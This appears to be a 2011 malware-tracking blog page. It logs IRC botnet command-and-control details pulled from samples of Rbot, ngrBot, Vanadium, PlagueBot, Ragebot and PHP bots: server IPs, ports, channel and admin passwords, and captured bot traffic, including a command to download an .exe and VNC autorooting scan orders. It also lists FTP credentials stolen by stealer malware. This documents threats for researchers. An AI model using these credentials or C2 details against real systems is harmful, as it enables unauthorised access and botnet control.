Pages

Saturday, April 30, 2011

FTP - Stealer's

IP 60.173.12.100
PORT 21
USER guest
PASS 123456
IP 188.40.69.151
PORT 21
USER metinnoob_log
PASS ws5XaX3B

Win32 - Rbot - 78.47.158.33

IP 78.47.158.33
PORT 6667
NICK USA|60052
USER plmgpbq 0 0 :USA|60052
JOIN ##alb## b!
USERHOST USA|60052
MODE USA|60052 -x
PONG :IRc.AlbEagle.Net

Friday, April 29, 2011

Win32 - ngrBot - 213.155.23.208

IP 213.155.23.208
PORT 8811
NICK n{US|XPa}hfwbxuw
USER hfwbxuw 0 0 :hfwbxuw
JOIN #paradise klash
PRIVMSG #paradise :[MSN]: Updated MSN spread message to "Funny as hell : http://bit.ly/fOCIGv"

Wednesday, April 27, 2011

Win32 - Vanadium - 208.98.40.236

IP 208.98.40.236
PORT 2211
NICK [DvLz-USA|XP]145603
USER 1456 "" "TsGh" :1456
PONG :F35FA39A
JOIN #DvLz DvLz#
PRIVMSG #DvLz :M4br0uk Ya M4ny4k, 4ll B0ts W3r3 K1ll3d!
PONG :Irc.D3v1Lz-6.Com

Monday, April 25, 2011

Win32 - PlaugeBot - evrcrew.serveirc.com

DNS : evrcrew.serveirc.com
IP : 210.213.145.86
Port:6667
Nick: PLAGUE|7083101
Username: sxetpzexk
Joined Channel: #ddos-hack with Password tuculoroto
// Scan
http://www.virustotal.com/file-scan/report.html?id=1a31b801c5c2c748e7d0981f23f17d086819498053d2b39089164277a06a3523-1303744052
// other bot on same server 

channel #evolutionreggae -plist 10
channel #adictnet# -key terrorismo

user_realname powered by EvR-Crew
user_modes +iBph
loginname EvR
connectionmethod direct
#usenatip localhost
#nickserv_pass mypass

adminpass YzaktbmQkmUuA
adminhost NetAdicto!*@*.*

Saturday, April 23, 2011

Win32 - ? - 46.166.129.253

IP 46.166.129.253
PORT 1863
NICK n{US|XPa}essrjtl
USER essrjtl 0 0 :essrjtl
JOIN #80t35ref 1963.g3rb3rs1t0.3691
JOIN #US
PRIVMSG #80t35ref :[d="http://www.euronautik.hr/files/news_it/downloads/103ff.exe" s="114688 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Kcxaxk.exe" - Download retries: 0

Linux - PHP - irc.xelon.co.cc

 var $config = array("server"=>"irc.xelon.co.cc",
                     "port"=>"7000",
                     "pass"=>"",
                     "prefix"=>"ZXel",
                     "maxrand"=>"5",
                     "chan"=>"#more",
                     "chan2"=>"#more",
                     "key"=>"gay",
                     "modes"=>"+ps",
                     "password"=>"more",
                     "trigger"=>".",
                     "hostauth"=>"*" // .cik < pass >

Linux - PHP - shkodra.rr.nu

$config = array("server"=>"shkodra.rr.nu",
                     "port"=>"6667",
                     "pass"=>"al",
                     "prefix"=>"al",
                     "maxrand"=>"4",
                     "chan"=>"#al#",
                     "chan2"=>"#al#",
                     "key"=>"al",
                     "modes"=>"+p",
                     "password"=>"futjakot",
                     "trigger"=>".",
                     "hostauth"=>"futja.kot.com"
                     );

Win32 - Ragebot - tres.hopto.org

// Ragebot is an vnc scanner botnet
DNS : tres.hopto.org
IP:118.69.220.81
Port:6667
Nick: raGe|TGrBASsoCp
Username: fadrqi
Joined Channel: ##rage## with Password rage
Channel Topic for Channel ##rage##: ".xpl 100 1 98 -b 3"
Private Message to Channel ##rage##: "^C14,1.:[^C15,1rAGEBoT^C14,1]:.^C15,1 range: 98 with 100 threads. (autorooting)"

Win32 - Ragebot - hacksecurity.dyndns.info

// Ragebot
DNS : hacksecurity.dyndns.info 
IP : 88.191.128.36
Port : 6667
Nick: raGe|VwyLaNJleo
Username: bpddcu
Joined Channel: ##vnc## with Password scan
Channel Topic for Channel ##vnc##: ".rarworm .p2p .xpl 100 1 190 -b 3"
Private Message to Channel ##vnc##: "^C14,1.:[^C15,1VNC^C14,1]:.^C15,1 range: 190 with 100 threads. (autorooting)"
Private Message to Channel ##vnc##: "^C14,1.:[^C15,1VNC^C14,1]:.^C15,1 p2p spread started."
Private Message to Channel ##vnc##: "^C14,1.:[^C15,1VNC^C14,1]:.^C15,1 rarworm activated."